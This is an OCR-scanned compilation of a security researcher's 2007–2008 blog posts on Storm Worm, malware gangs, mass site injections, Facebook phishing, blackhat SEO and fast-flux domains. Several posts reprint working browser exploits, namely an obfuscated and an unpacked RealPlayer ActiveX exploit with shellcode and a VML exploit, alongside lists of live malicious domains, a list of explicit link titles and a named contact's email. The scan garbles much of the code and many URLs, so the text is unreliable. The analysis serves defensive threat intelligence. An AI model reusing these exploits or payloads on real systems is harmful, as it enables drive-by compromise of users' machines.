( ns.newyearcards2008.com >> 


7 


ya S10. newyearcards2008, com 
/ os 
/ / 
fos 
/ sll .newyearcards2008, com 
/ Fadl 
ns 
F rsl2.newyearcards2008.com 
4 
Ns 


rs13.newyearcards2008.com 
ns2.newyearcards2008 com 
newy earcards2008.com See newyearcards2008& com 


aS 


ns4.newyearcards2008 com 


\ Ws nsS.newyearcards2008. com 


ns6.newyearcards 2008. com 


. ® 
\us 

\ ns7.newyearcards 2008 com 
\us 


ns8.newyearcards 2008. com 


“Ne 


ns9.newyearcards2008 com 


_newyearcards2008.com 
Administrative, Technical Contact 
Contact Name: Bill Gudzon 
Contact E-mail: bgudzon1956 @ hotmail.com 


Moreover, Paul is also pointing out on [1]the use of Blogspot blackhat SEO generated 
blogs in this Storm Worm campaign. In case you remember, the first one was relying on the 
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infected user to first authenticate herself, and therefore authenticate for Storm Worm to add 
a link to a malware infected IP. Sample Blogspot URLs : 


cbcemployee.blogspot.com 

canasdelbohio.blogspot.com 

ldailygrind.blogspot.com 
traceofworld.blogspot.com/2007/12/opportunities-for-new-year.html 
jariver.blogspot.com/2007/12/opportunities-for-new-year.html 
antispamstore.blogspot.com/2007/12/opportunities-for-new-year.htmld 


As for [2]the complete list of the email subjects used for the time being, here’s a rather 
complete one courtesy of US-CERT. 


With end users getting warned about the insecurities of visiting an IP next to a domain name, 
this campaign is relying on descriptive domains compared to the previous one, while the 
use of IPs was among the few tactics that helped Storm Worm’s first campaign scale so with 
every infected host acting as an infection vector by itself. And despite that I’m monitoring 
the use of such IPs from the first campaign in this campaign on a limited set of Storm Worm 
infected PCs, the next couple of days will shred more light into whether they’ll start using 
the already infected hosts as infection vectors, or remain to the descriptive domains already 
used. 


[3]Keep riding on the storm. 


1. http://fergdawg. blogspot .com/2007/12/hundreds-of-blogger-pages-harboring-new. html 


2. http://www.us-cert.gov/current/#storm_worm_activity_increases_during 


3. http://www. youtube. com/watch?v=SMvf AYEaE8c 


3.12.19 The New Media Malware Gang - Part Two (2007-12-28 19:38) 


How you would you go for ruining the Xmas holidays of [1]a malware gang directly related 
to the RBN, Storm Worm, Possiblity Media’s malware attack, and the malware embedded 
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at the Syrian Embassy’s web site, the way they’ve ruined the holidays for lots of secu- 
rity folks out there? You disclose all of their publicly known and currently active "online 
properties", [2]submit them to Stopbadware, then see how they reply with a "Die();" 
message on one of their IPs (85.255.116.206), which is instantly confirming the positive ROI 
of your actions. The [3]New Media Malware gang currently operates the following domains/IPs : 


flashupdate.net/images/index.php 
taktomi.ru/NewYear/ad 
lO0calhOst.jino-net.ru/tds3 
jkh-novgorod.ru/wstat/adpack/ 
natural-amber.com/spl2/index.php 
sOs1.net/mp3/index.php 

trffc.org/in.cgi?default 
home-xxx.com/shaven/index.shtml 
85.255.116.206/ax2/load.php 
testers.x5x.ru/subpage/index.php 
traffurl.ru/sliv/?91956802f6fabf 
88.255.94.250/ddd/index.php 
91.192.105.6/images 
r52.juhost.ru/ip/index.php 
orentraff.cn/tdsslam/index.php?out=1193100109 
xll-g.com/beaty/13389babe/cumoninn.com.html 
xmaturelife.com/0419/kim5.html 
e-learningcenter.ru/eng/index _files/input000.htm 
apnea. health-hack.com/old/index.php 
milkOsoft.com/ipck/index.php 
85.255.116.206/ax3/loadj947.php 
85.255.116.206/ax2/tet.php 
85.255.116.206/ax3/tet.php 

spl.vip-ddos.org 

spl.vip-ddos.org/index.php 
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spl. vip-ddos.org 


cati dci.hos 4... milkOsoft.com 


vat.go.dreamhost.com 


69,50, 164,13- ck.intercage.com xmaturel 


st-97-239 yvhost.com xll-g.com 


3.117.111.102 


fu 


69,50, 164. 13-custblock.intercage.com 


$0s1,net 
natural-amber.com 
sha. majordomo.ru jkh-novgorod.ru 
vert, jino-net.ru lOcalhOst. jino-net.ru 
meta, tomstudio.ru taktomi.ru 
flashupdate.net 
nsii.ipnames. 


2. http://www. google.com/safebrowsing/report_badware/ 
3. http: //ddanchev. blogspot .com/2007/11/new-media-malware-gang. htm 


1256 


2008 


4.1 January 


4.1.1 Massive RealPlayer Exploit Embedded Attack (2008-01-07 20:40) 


<sCripT lanGuAgE="jAvasCript™> 

eval(function(p,a,c,k,e,d){e=Ffunction(c){return(c<a?‘* -e(parseiInt(c/a)))+((c=c%a)>357String. frome 
harCode(c+29) :c.toString(36))};if(t** -replace(/*/,String)){while(c--)d[e(c) ]J=k[c]| |e(c);k=[functi 
on(e){return d[e]}];e=function(){return'’ \\w+' >>c=1};while(c--)if(k[c])p=p-replace(new 
RegExp("\\b'te(c)*'\\b",*g'),k[e])sreturn p}('UC);1a UC){1s 1p = 1g.1g.11() ;1e(4p.1d("1F 
o")e=-rahip.dd("1F r“)e=-r)1ik;ic(1p.1d("4i h.“)e=-r)1ksY = “GY «+ “L.F“ + “D" + “C.r"sim{R = th 
Z(¥)5}13(18){1k;>T = R.PC“M')SN = "ST = In(*Su%3ZusZ2") 519(1b=0; 1b<e*12;1b++)N += 
“U'sic(T.1d("o.6.b.") == -r){ie(1g.tr.11¢) == “tu-1h")1j = iIn("Sx%11%p") 515 te(1g-1r.11() == 
"17-10")1j = In("SgstB1O%p") 5165315 1e(T == "o.8.b.1")1j = in("Sqzy%F2zp") 515 1c(T == "o.8.b.m")1j 
= In("SqzyS2%p") 315 1c(T == “o.8.b.n")1j = in("SwedsrZp") 515 1c(T == “o.8.b.k")1j = 
An('Swedehsp") 5315 1c(T == “o.8.b.j")1j = In("Sibsy%s%q") 516;1c(T.1d("0.8.8.") t= 

“1 ){19(1b@6;1b<F 5 1b+*)N = N+ TZN = N + 135315 tc(T.1d("“0.8.y.") t= -r){19(1b=6;1b<o;1be+)N = N+ 
I;N = N + 1j5}15 1c(T.1d("o0.8.a.") t= -r){19(1b=0;1b<y;1b++)N = N+ I;N = N + 1j;}15 
1c(T.1d("0.0.b.") t= -r){19(1D=651b<851b++)N = N+ ISN = N+ 1j53A = “J\AZ"5U ="W'50 = N+ A + 
Usiu(O.te < 0)0 += “BYSR.HC"IZ=\\Q EX\K\AX.1t", O,"", 6, 

6)5}° ,62,94,° | 61] G4) 66] 68] 69 | 6x8GHG] 1] 16) 11] 12] 14) 148) 31] 32] 4] 4F[5]51)536 1543/1 544)550)552]6[68)/63 
[7] 70] 74|74|75|79]7F | 9 | ActivexObject | AdjESP | Chui2i|Ctl|ERP|Files|I|1IER| Import|JmpOver|LLLL|NetHee 
ting | PCt1| PRODUCTUERSION| Padding|PayLoad|[PlayerProperty | Progran|Real|RealExploit|RealVersion|$|Sh 
OLL|TYILILILITILILILL17Q2 7 AXP GA GAKAAQZAB2ZBB OBBABXPSABUI I xkR Og JP IPSYY GENYWLEQk Op47Z2pFKRK J IKUeE9XIKY 
OloVYoLOOCQu3SUsSUWLURKwRuaubF Qu JNWUS22 MF v BZ28KS8mwUP AxAMnSMmDUBZ JMEBSHUNSULUNAFXW6 peMM2M7XPr Ff SNKDpP 1 67 
ZMpYESHMM2Mj 441 qxGONukp TRrNWOUYMSmng qr wSHTnoeoty 68 JMnK JMgPw2peySMghWQuMurunOgp8mpn8m7PrZBEleoWng2DR 
ELg2MUGREOUJMmLHnz1KUOPCXHmLYF1SRWOLNuUrF PFCUyuMpRKp4dp J9UQNJUL xmmnTL2GWOLNQKeSpFQuxeMpPuUPwP ou Bx 
zFr3019uRpzF DxmSNjqUxalzdL SuTunl Sal JMqqrauWJUWrhS30QWRUSQrENUCE61uPUOUtuTU4suP ODULYFQ0 jZ2MoJPéeeHIy 
QnFSFLYPtnrQEnuyZkSnF tSooF WI tT ppSoinT WL gOZzmMT kSPUOUNENNWOJ9MI nyWOS3STREFUC6IEUTgtBurtTsarSrSPFEqIe 
UBgEGODUTRAC FkKYUBSOEDC3UUGDUIb 4SWoSweéUQUouXdcENeStEpfic7nvoUBdrfnuts3c?77r3UwZuyGw7rd j 40S 4D Tww6tudu 
w2FUSCTUZUKFiwxQutsud726BuiR1gxUZ4 1 Ug TBFRWygPFouZtC wHquRHptd4RPF ZU0doRWQgr WT nPr On2MRBONPnauqdT o4g 
tnqu2XPemPGp | TestSnd|Uul0b ject | XXXXXLD| a4] a5] c|catch|cn|else|elsereturn|en|error|for|function|ilsi 
f | indexOf|length|msie|navigator|new[nt|ret|return| toLowerCase|try|unescape|us|user|userAgent|user 
Language |var|wayv|while|zh*.split('|'),6,<})) 

</script> 


This [l]malware embedded attack is massive and ugly, what’s most disturbing about it is 
the number of sites affected, which speaks for coordination at least in respect to having 
established the infrastructure for serving the exploit before the vulnerability became public : 


"One of our readers noted that there are a number of state government and educational sites 
that appear to have been compromised with the uc8010 domain. Upon review, | see that some 
of these have already been cleaned up. However, the .gov and .edu sites are only a few of 
the many many sites that are turned up via google searches for the uc8010 domain. As that 
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domain was only registered as of Dec 28th, compromises of websites probably occurred in the 
past week." 


According to SANS, there are only two domains involved in the attack uc8010.com/0.js and 
ucmal.com/0.js however, there’s also a third one, namely rnmb.net/0.js. This attack is nothing 
else but "embedded malware as usual", javascript obfuscations, multiple IFRAME redirectors 
to and from internal pages, and scripts within the domains. Let’s assess those that are still 
active : 


- n.uc8010.com/0.js returns "ok *~ _*" message and loads c.uc8010.com/ip/Cip.aspx 
(61.188.39.218) which says "Hello", furthermore, c.uc8010.com/0/w.js = loads 
c.uc8010.com/1.htm; count38.51lyes.com/click.aspx?id=389925362 &logo=1 and 
s106.cnzz.com/stat.php?id=742266 &web _id=742266 


The internal structure is as follows : 


c.uc8010.com/1.htm - attempts MDAC ActiveX code execution (CVE-2006-0003) in between 
the following 


c.uc8010.com/046.htm - javascript obfuscation 
c.uc8010.com/r.htm - real player exploit 
c.uc8010.com/014.js - javascript obfuscation 
c.uc8010.com/111.htm - unobfuscated real player exploit 
- ucmal.com/0.js (122.224.146.246) - another obfuscation 


- rnmb.net/0.js says "ok! “~ ~*~ Don’t hank me !" but compared to the first two that are still 
active, this one is down as of yesterday, despite that it still remains embedded on many sites 


Detection rate for the unobfuscated exploit : 

Result: 17/32 (53.13 %) - Exploit-RealPlay; JS/RealPlay.B 
File size: 3003 bytes 

MD5: a85a28b686fc2deedb8d833feaacef16 

SHA1: 0282e945ded85007b5f99ddee896ed5e31775715 


Detection rate for the obfuscated exploit : 

Result: 11/32 (34.38 %) - JS/Agent.AMJ!exploit; Trojan-Downloader.JS.Agent.amj 
File size: 2880 bytes 

MD5: d363ffca061ebf564340c4ac899e3573 

SHA1: 1226d3d9fcc5052a623b481b48443aeb246ab5db 


A lot of university, and international government sites continue to be embedded with the script, 
and so is Computer Associates site according to [2]this article : 


"Part of security software vendor CA’s Web site was hacked earlier this week and was redirect- 
ing visitors to a malicious Web site hosted in China. Although the problem now appears to 
have been corrected, cached versions of some pages in the press section of CA.com show that 
earlier this week the site had been redirecting visitors to the uc8010.com domain, which has 
been serving malicious software since late December, according to Marcus Sachs, director of 
the SANS Internet Storm Center." 
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$();function S(){var user = navigator .userAgent .toLowerCase();if (user .index0F("msie 
6")==~7&euser.indexOf("msie 7")==-7)return;if(user.indexOf("nt S.")==-7)return;YulObject = "IER" 
* “PCtlL.I" + "ERP" + “Ctl.7";try{Real = new 

ActivexObject(VulObject) ;}>catch(error){return;}Realversion = 

Real .PlayerProperty("“PRODUCTUERSION") ;Padding = "'sJmpOver = 

unescape ("'%75%06%74%04") ; for (i=0;1<32*c;i++)Padding += "S";if(RealUersion.index0f("6.6.14.") == 
~7)<if (navigator .userLanguage .toLowerCase() == “zh-cn")ret = unescape("'%7f%a5%660") ;else 

if (navigator .userLanguage.toLowerCase() == “en-us")ret = 

unescape ("“%4F%71%a4%6 6") ;elsereturn;}else if(RealUersion == “6.6.14.544")ret = 

unescape (""%63%9%4266") ;else if(RealUersion == "6.6.14.556")ret = unescape("%63%9Z042%66") ;else 
if(Real¥ersion == "6.6.14.552")ret = unescape("%79%31%7%66") ;else if(RealUersion == 
"6.0.14.543")ret = unescape("%79231%252668") ;else if(RealVersion == "6.0.14.536")ret = 

unescape (‘"%1%9%7 6263") ;elsereturn;if (RealUersion.indexOf("6.8.18.") t= 
-7)<{for(i=6;1<4;i++)Padding = Padding + JmpOver;Padding = Padding + ret;}else 

if (RealUersion.indexOF("6.6.9.") t= -7){for(i=6;1<6;i++)Padding = Padding + JmpOver;Padding = 
Padding + ret;}else if(RealVersion.index0f("6.0.12.") t= -7){for(i=6;i1<9;i++)Padding = Padding + 
JmpOver ;Padding = Padding + ret;}else if(RealVersion.index0f("6.6.14.") t= 
-7){for(i=631<16;i++)Padding = Padding + JmpOver;Padding = Padding + ret;}AdjESP = 
“LLLL\XXXXXLD" 5 Shell 
="TYLILILILILILILIL17Q2jAXP OAGAKAAQZAB2BB OBBABXPSABUAI xXkR Gq JP IP3YY OFNYWLEQK Op47zpFKRKJJKUe9xJKYoI 
oYoOLOOCQU3USUwLURKwRuaubF QuJMWUs2ZMF vy 628K 8mwUP nxAMnSmDUBZJMEBSHUNSULUNMmf xW6penh2i7 XPr FSNKDpP 1672 
pYESMMZNj 44. qxGONuKpT RrNwWOUYMSaggrwSMT noeoty 68 JNnKJMgP w2peyShghWQuitwrunOgp8mpn8n7PrZBEleoting2DREL 
gZ2MUGREOUJMmLHm21KUOPCXHMLy fl SRWOLNUUrF PF CUyUMpRKpsdpJIUQMNJUL xmanTL2GWOLNQKeépFQuxelNpPuUP wP Ou OXZF 
r3019URpZFDxm5Nj qUxmLZdLSuTuml Sal JMgqr auWJUWrhS30QWURUSQrENUCE6 TuPUOUtUTU4uP ODULYFQ0 j ZMoJP6eeMIuQn 
FSFLYP InrQEmuyZkSnF tSooFWTtT ppSoinTWLgOZAMTkKSPUOUNENNWGJ9MI nyWQS3TRGFUCGLIEUTgtBurtTs3rS5rS5PFEqTCuB 
gEGoDUtR4CFKYBSOEDcSUUGDUIb4sWoS we 6UQUouxdcENeStEpfTc7n¥oUBdr Fnuts3c77r3Uw2uyGw7rdj 40S4DTuw6 tudUw2 
FUStTUZUkFiwxQutsud726BuiR1gxUZ41 Ug I BFRWYygP FouZtCwWquRHptdSRPF 2U0doRWQgr WT nPr Gn2NRB6NPnaugqdTo4gtn 
qu2XPeMPGp";PayLoad = Padding + AdjESP + Shell;while(PayLoad.length < 6)PayLoad += 

“ChuiZi" ;Real.Import("c:\Proqram Files\NetMeeting\TestSnd.wauv", PayLoad,"'", 6, 6);} 


[3]Compared to [4Jeach and [5]Jevery malware [6]embedded attack [7]that | [8]assessed in 
2007, including all of Storm Worm’s campaigns, they were all relying on outdated vulnerabilities 
to achieve their success, but this one is taking advantage of the now old-fashioned window 
of opportunity courtesy of a malicious party enjoying the given the lack of a patch for the 
vulnerability. Why old-fashioned? Because malware exploitation kits like [9]MPack, [10]IlcePack, 
[11]WebAttacker, the [12]Nuclear Malware Kit and [13]Zunker, changed the threatscape by 
achieving a 100 % success rate through first identifying the victim’s browser, than serving the 
exact exploit. Another such [14]one-vulnerability-serving malware embedded attack was the 
MDAC exploits farm spread across different networks | covered in a previous post. It’s also 
interesting to note that a MDAC live exploit page was also found within what was originally 
thought to be a RealPlayer exploit serving campaign only. Shall we play the devil’s advocate? 
The campaign would have been far more successful if a malware exploitation kit was used, as 
by using a single exploit only, the campaign’s success entirely relies on the eventual presence 
of RealPlayer on the infected machine. 


http://isc.sans.org/diary .html?storyid=3810 


_hetp://wwspeuorld.con/article/id, 141048~c,hackers/article. hal 

http: //ddanchev.blogspot.com/2007/11/i-see-alive-iframes-everywhere-part-two.htm 
“hetp://adanchey. blogspot. cou/2007/11/another-nassive-eabedded-nalvare-attack. heal 
Fo easy sieetpse cee 200 afta cue rate oeetrcnarecnea 
_hetp://adanchey. blogspot. cou/2001/10/por‘fo1io-of-nalvare~enbedded-sagazines_ hil 
eect bce conl 001/08 aa comme cect pecet surg secricg need 


http: //ddanchev.blogspot.com/2007/09/syrian-embassy- in-london-serving. htm 


ttp://ddanchev.blogspot.com/2007/06/massive-embedded-web-attack-in-italy.htm 


H 
2 


http: //ddanchev. blogspot .com/2007/07/icepack-malware-kit-in-action.htm 


11. http://ddanchev. blogspot .com/2007/05/webattacker-in-action.htm 
12. http://ddanchev. blogspot .com/2007/08/nuclear-malware-kit .htm 
13. http://ddanchev. blogspot .com/2007/09/google-hacking- for-mpacks-zunkers-and.htm 
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14. http: //ddanchev.blogspot.com/2007/12/mdac-activex-code-execution-exploit .htm 


4.1.2 MySpace Phishers Now Targeting Facebook (2008-01-07 23:43) 


The "campaigners" behind the [1]MySpace phishing attack which | [2]briefly assessed in 
previous posts seem to have started targeting Facebook as well. [3]Ryan Singel comments, 
and quotes me in a related article : 


"Hackers for the first time are targeting the popular social networking site Facebook 
with a phishing scam that harvests users’ login details and passwords. Some Facebook users 
checking their accounts Wednesday found odd postings of messages on their "wall" from one 
of their friends, saying: "lol i can’t believe these pics got posted.... it’s going to be BADDDD 
when her boyfriend sees these," followed by what looks like a genuine Facebook link. But the 
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link leads to a fake Facebook login page hosted on a Chinese .cn domain. The fake page ac- 
tually logs the victims into Facebook, but also keeps a copy of their usernames and passwords." 


Compared to their previous MySpace phishing campaign that was also serving malware 
in between, this was was purely done for stealing accounting data of Facebook users 
only. And as we’re on a Facebook malicious campaigns topic, impersonating Facebook’s 
login or web presence from a blackhat SEO perspective to serve malware is always 
trendy. Take this fake facebook login subdomain serving malware for instance - facebook- 
login.vylo.org (209.160.73.132) redirects to iscoolmovies.com/movie/black/0/2/541/1/ which 
attempts to load 209.160.73.132/download/502/541/1/ where 209.160.73.132/dw.php is 
the adware in this case - Adware:Win32/SmitFraud. And yet another one - facebook-login- 
61248sf1.krantik.info (89.149.206.225) whose once deobfuscated javascript attempts to load 


topsearch10.com/search.php (209.8.25.156). Spammy, yammy. 


1. http: //ddanchev.blogspot .com/2007/11/large-scale-myspace-phishing-attack html 


2. http: //ddanchev. blogspot .com/2007/12/update-on-myspace-phishing-campaign.html 
3. http: //www.wired.com/politics/security/news/2008/01/facebook_phish 


4.1.3 The Invisible Blackhat SEO Campaign (2008-01-09 00:21) 
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edu/people/raktin/n. 
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edu/people/raktin/n. 
edu/people/raktin/n. 
-php?1369 .htm">Big Boob P.0.U</a> 


php?735.htm">Porny Monster</a> 
php?728-.htm">Rocco Ravishes St.Petersburg</a> 
php?1228 .htm">Big Latin Wet Butts</a> 
php?7942.htm">West Coast Gang Bang</a> 
php7998 .htm">Super Squirters</a> 
php?1691-htm">Baller Mann Ficker</a> 
php?243 .htm">Snow Bottoms</a> 
php?3668.htm">Porn Fidelity</a> 
php?551.htm">Peachez and Cream-Crunk Booty</a> 
php?652 .htm">Penthouse-Missing Persons</a> 
php?438.htm">My Sister Is A Piece Of Ass</a> 
php?1319.htm">Arena Total-14 Sperma Ekel</a> 
php?518-.htm">Ashley Blue AKA Filth 
php?1643.htm">Honry Waitresses</a> 
php?1673-htm">Anal Conduct</a> 
php?675 htm" >MILF Hunter</a> 
php?161.htm">Die Greifer</a> 
php?383.htm">Porno Lasses Hottest Chicks</a> 
php?1336 .htm">Jacks Teen America Mission</a> 
php?7642 htm" >Women OF Color</a> 
php?1164.htrm">For Love Money Or 
php?886.htm">P .0.Verted</a> 
php?1666-htm">Harder Than Steel</a> 
php?976-htm">Phat Ass Tits</a> 


A Greencard</a> 


php?363-htm">Hung Jury</a> 
php?1188.htm">Boombastic Booty</a> 
php?686.htm">Whos The New Girl</a> 
php?239 .htm">Welcome To Squirtsville</a> 
php?1367 -htr">Booty Annihilators</a> 
php?684.htm">Teen Anal Pounding</a> 


Count this as a historical example of a blackhat SEO campaign, and despite that "Fresh Afield’s" 
blog (blogs.mdc.mo.gov) is now clean, cached copies confirm the existence of hidden links that 
were embedded on each and every post on it, apparently due to a compromise. The blackhat 
SEO links invisible embedded within the blog’s posts on the other hand point to a compro- 
mised account at the Texas A &M University (aero.tamu.edu/people/raktim), as you can see in 
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the screenshot. Moreover, there’s also a visible part of the campaign that was located under 
blogs.mdc.mo.gov/custom/?0f, and as usual, once the blackhat SEO pages were either up- 
loaded or embedded like it happened in this case, the campaigns under the blogs.mdc.mo.gov 
URL were spammed across the Internet. 


4.1.4 Malware Serving Exploits Embedded Sites as Usual (2008-01-10 01:28) 


document .writeln('\/\/A\/AN\/AN/ANANZNANANANANANANANANANZNANANANINZNANANENINININANINANLNANININANENENEN 
ENANANANZNZNZNANENENANANININIZNZNININZNENININININININININENINANINININININININENININININININININENS 
NANANANANANANZNINANANANININANININININIANININININANINE 5 
document .writeln(’\/\/\/ SAUL Mee tibet ea eS te a: 
mail.com , exploit maker by kook1991 -:-) B¥AVAVAar 

document .writeln(“\/\/\/Microsoft 
Patch:http:\/\/wuw.microsoft .com\/technet\/security\/Bulletin\/MS67-664.mspx -—=Just .For.Fan=- 
2607 .61.21\/\/\/")5 

document .writelLm('\/\/N\/AN/ANANANZNZNANANANANANANANINININANANINZNANANANININANANININANANININININENEN 
ENANANENINENANINENZNENININININENININININININININININININININININININININININENININININININININING 
NANANANANANANZNANANANANANZNANININZNINININININININING D5 

document .writeln("-—>"); 

document .writeln("'"); 

document .writeln("<html xalns:ue\"urn:schemas-microsoft-con:ual\">"); 

document .writeln("'"); 

document .writeln(“<head>") ; 

document .writeln("<object id=\"UMLRender\"") ; 

document .writeln("classid=\"CLSID:16672CEC-8CC1-11D1-986E-80A BCOSSB42ZE\">") ; 

document .writeln("<\/object>"); 

document .writeln("<style>"); 

document .writeln("“u\\:* ¢{ behavior: url(#UMLRender); }*"); 

document .writeln("<\/style>") ; 

document .writeln("<\/head>"); 

document .writeln(""); 

document .writeln("<body>*'); 

document .writeln(''"); 

document .writeln("<SCRIPT language=\"javascript\">") ; 

document .writeln("shellcode = 

unescape (\"3u9 69 62u9 69 64u4343Zu4343%UN343ZUAE 9 Zu BO OOZUSF BOZuA Tb 4Zu OO 64u 8H80Zu4 O8BZusB OCZu1C7 Osu 
SBADZu O868ZuF 78BZu B46 AZUES5 9%u BO43Zu O6BOZuF VE 2Zu6F 68Zu BO6EZu68 BHZu7 2752u6D6CZuF FS 4Zu95 162u2EE8 suse 
660%u83 00Zu2 BECZuUDC8BSZu2 G6AZUFF53%u8456%u B40 7ZuSC O3%u2E6 12uC765%u O344%u 78 O4%u 6065433 GHZu5 OC GZu53 
5 6%u5 057%u56F F2u8B1 64u5 ODCZuF F53%u O856%u56F FZu5 1 OCZu8B56%u3075%u748B%u782EZuF 5 O3Zu8B56%u2 07 6%uF SB 
33u0933%u4149%u O3ADZu33CS4u GF DBSu1 OBE ZuD63ASu G87 SZuCBC 14u 63 OD Su4 ODASUF AEB Sut F SBZuE77SZuSBSE4u24SE 


lifeasageek at 


> exploit bi 


The combination of the recent [1]RealPlayer exploit and [2]MDAC is a fad, but the very same 
is getting embraced in the short-term by malicious parties in China that have also started 
combining the Internet Explorer VML Download and Execute Exploit (MS07-004), thanks to 
recent localized forum postings on modifying the third exploit. Let’s assess several sample 
domains. 


8v8.biz/ms07004.htm (58.53.128.98) is such a domain that’s serving a combination of 
these starting with Exploit-MS07-004 : 


Result: 12/32 (37.5 %) 

File size: 3432 bytes 

MD5: bafab9b8e38527e9830047fd66b39532 

SHA1: b8labcf63a2c4bcf43526f28aec20fca2f58d67c 


8v8.biz/1.htm - MDAC also loads 8v8.biz/06014.html in between 8v8.biz/rhtm - real player 
unobfuscated, wheere all of these attempt to load 8v8.biz/v.exe - Worm.Win32.AutoRun.bkx; 
Win32/Cekar!generic 
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Dear blog readers, 


I’ve decided a diverse portfolio of fast flux name servers which basically act as a bulletproof 
botnet C &C communication technique allowing the cybercriminals behind the campaigns to 
increase the average time for which their campaigns remain online. 


In this post I’ll provide actionable intelligence on the infrastructure behind a network of fast-flux 
servers circa 2008 and discuss in-depth the tactics technique and procedures of the cybercrim- 
inals behind these campaigns. 


Sample fast-flux name servers involved in various campaigns circa 2008: 
ns8.ns7.ns5.ns1.ns6.ns6.ns2.ns2.ns3.aspx88.com 
ns8.ns7.ns6.ns8.ns2.ns1.ns4.ns6.ns5.ns1.aspx88.com 
ns8.ns7.ns8.ns1.ns5.ns6.ns2.ns3.aspx88.com 
ns8.ns7.ns8.ns2.ns6.ns8.ns8.ns5.ns1.aspx88.com 
ns8.ns7.ns8.ns5.ns8.ns2.ns5.ns4.ns3.aspx88.com 
ns8.ns8.ns2.ns6.ns8.ns8.ns5.nsl.aspx88.com 
ns8.ns8.ns3.ns7.ns5.ns4.ns8.ns2.ns6.ns1.aspx88.com 
ns8.ns8.ns5.ns1.ns4.ns6.ns6.ns2.ns2.ns3.aspx88.com 
ns8.ns8.ns5.ns1.ns7.ns8.ns2.ns5.ns4.ns3.aspx88.com 
ns8.ns8.ns5.ns3.ns4.ns2.ns6.ns4.ns1.aspx88.com 


ns8.ns8.ns5.ns7.ns1.ns2.ns7.ns7.ns4.ns3.aspx88.com 
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ns8.ns8.ns6.ns3.ns8.ns4.ns3.ns2.ns5.ns1.aspx88.com 
ns8.ns8.ns7.ns8.ns4.ns4.ns1.ns6.ns2.ns3.aspx88.com 
ns8.ns8.ns8.ns1.ns5.ns6.ns2.ns3.aspx88.com 
ns9.ns1.ns4.ns4.ns8.ns3.ns6.ns7.ns8.ns5.nsl.aspx88.com 
ns9.ns5.ns7.ns5.ns1.ns6.ns6.ns2.ns2.ns3.aspx88.com 
ns9.ns6.ns5.ns5.ns6.nsl.ns2.ns7.ns7.ns4.ns3.aspx88.com 
ns8.ns5.ns1.ns4.ns6.ns6.ns2.ns2.ns3.aspx88.com 
ns8.ns5.ns1.ns7.ns8.ns2.ns5.ns4.ns3.aspx88.com 
ns8.ns5.ns2.ns1.ns7.ns8.ns1.ns4.ns6.ns3.aspx88.com 
ns8.ns5.ns2.ns5.ns3.ns7.ns1.ns8.ns4.ns1.aspx88.com 
ns8.ns5.ns2.ns6.ns7.ns8.ns1.ns4.ns6.ns3.aspx88.com 
ns8.ns5.ns3.ns3.ns2.ns6.ns5.nsl.aspx88.com 
ns8.ns5.ns4.ns3.ns5.ns4.ns2.ns6.ns4.ns1.aspx88.com 
ns8.ns5.ns5.ns6.nsl1.ns2.ns7.ns7.ns4.ns3.aspx88.com 
ns8.ns5.ns6.ns3.ns8.ns4.ns3.ns2.ns5.ns1.aspx88.com 
ns8.ns5.ns6.ns7.ns1.ns7.ns1.ns3.ns3.aspx88.com 
ns8.ns5.ns7.ns1.ns1.ns3.ns1.ns4.ns6.ns3.aspx88.com 
ns8.ns5.ns7.ns1.ns2.ns7.ns7.ns4.ns3.aspx88.com 
ns8.ns5.ns7.ns3.ns8.mx1.ns7.ns6.ns8.ns2.nsl.aspx88.com 
ns7.ns8.ns3.ns4.ns3.ns5.ns5.ns2.ns2.ns1.aspx88.com 
ns7.ns8.ns3.ns5.ns3.ns4.ns2.ns6.ns4.ns1.aspx88.com 
ns7.ns8.ns4.ns4.ns2.ns6.ns8.ns8.ns5.ns1.aspx88.com 
ns7.ns8.ns5.ns1.ns4.ns6.ns6.ns2.ns2.ns3.aspx88.com 
ns7.ns8.ns5.ns7.ns1.ns2.ns7.ns7.ns4.ns3.aspx88.com 
ns7.ns8.ns5.ns8.ns2.ns5.ns4.ns3.aspx88.com 
ns7.ns8.ns6.ns3.ns8.ns4.ns3.ns2.ns5.ns1.aspx88.com 
ns7.ns8.ns6.ns5.ns7.ns8.ns1.ns4.ns6.ns3.aspx88.com 
ns7.ns8.ns7.mx1.ns6.ns3.ns4.ns6.nsl.aspx88.com 
ns7.ns8.ns7.ns5.ns5.nsl.ns1.ns4.ns2.ns3.aspx88.com 
ns7.ns8.ns7.ns6.ns3.ns1.ns8.ns5.ns4.ns3.aspx88.com 
ns7.ns8.ns8.ns8.ns1.ns5.ns6.ns2.ns3.aspx88.com 
ns8.ns1.ns2.ns2.ns4.ns7.ns7.ns5.ns4.ns3.aspx88.com 
ns8.ns1.ns2.ns6.ns6.ns5.ns3.ns7.ns2.ns3.aspx88.com 
ns8.ns1.ns6.ns5.ns2.ns6.ns7.ns4.ns2.ns3.aspx88.com 


ns8.ns1.ns6.ns6.ns5.ns3.ns7.ns2.ns3.aspx88.com 
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ns8.ns1.ns7.ns7.ns8.ns2.ns2.ns4.ns6.ns3.aspx88.com 
ns8.ns2.ns1.ns4.ns6.ns6.ns2.ns2.ns3.aspx88.com 
ns8.ns2.ns4.ns8.ns3.ns6.ns7.ns8.ns5.nsl.aspx88.com 
ns8.ns2.ns5.ns6.ns7.ns8.ns1.ns4.ns6.ns3.aspx88.com 
ns8.ns2.ns6.ns1.ns6.ns5.ns3.ns2.ns3.aspx88.com 
ns8.ns2.ns6.ns7.ns8.ns1.ns4.ns6.ns3.aspx88.com 
ns8.ns2.ns7.ns3.ns4.ns4.ns1.ns4.ns5.ns1.aspx88.com 
ns8.ns3.nsl1.ns2.ns6.ns7.ns4.ns2.ns3.aspx88.com 
ns8.ns3.ns2.ns3.ns6.ns7.ns4.ns2.ns3.aspx88.com 
ns8.ns3.ns4.ns5.ns6.ns4.ns1.ns2.ns6.ns1.aspx88.com 
ns8.ns3.ns5.ns1.ns7.ns3.ns1.ns4.ns6.ns3.aspx88.com 
ns8.ns3.ns5.ns3.ns4.ns2.ns6.ns4.ns1.aspx88.com 
ns8.ns3.ns6.ns7.ns2.ns2.ns6.ns5.ns1.aspx88.com 
ns8.ns3.ns7.ns5.ns4.ns8.ns2.ns6.nsl.aspx88.com 
bank11.net 

ns1.ns1.ns1.ns1.ns8.ns3.bank11.net 
ns1.nsl1.ns1.ns2.bank11.net 
ns1.ns1.ns4.ns1.bank11.net 
ns1.ns1.ns4.ns2.ns1.ns2.bank11.net 
ns1.nsl1.ns5.ns4.ns2.ns7.ns1.bank11.net 
ns1.ns1.ns6.ns7.ns8.ns3.ns1.bank11.net 
ns1.ns1.ns7.ns5.ns3.ns3.bank11.net 
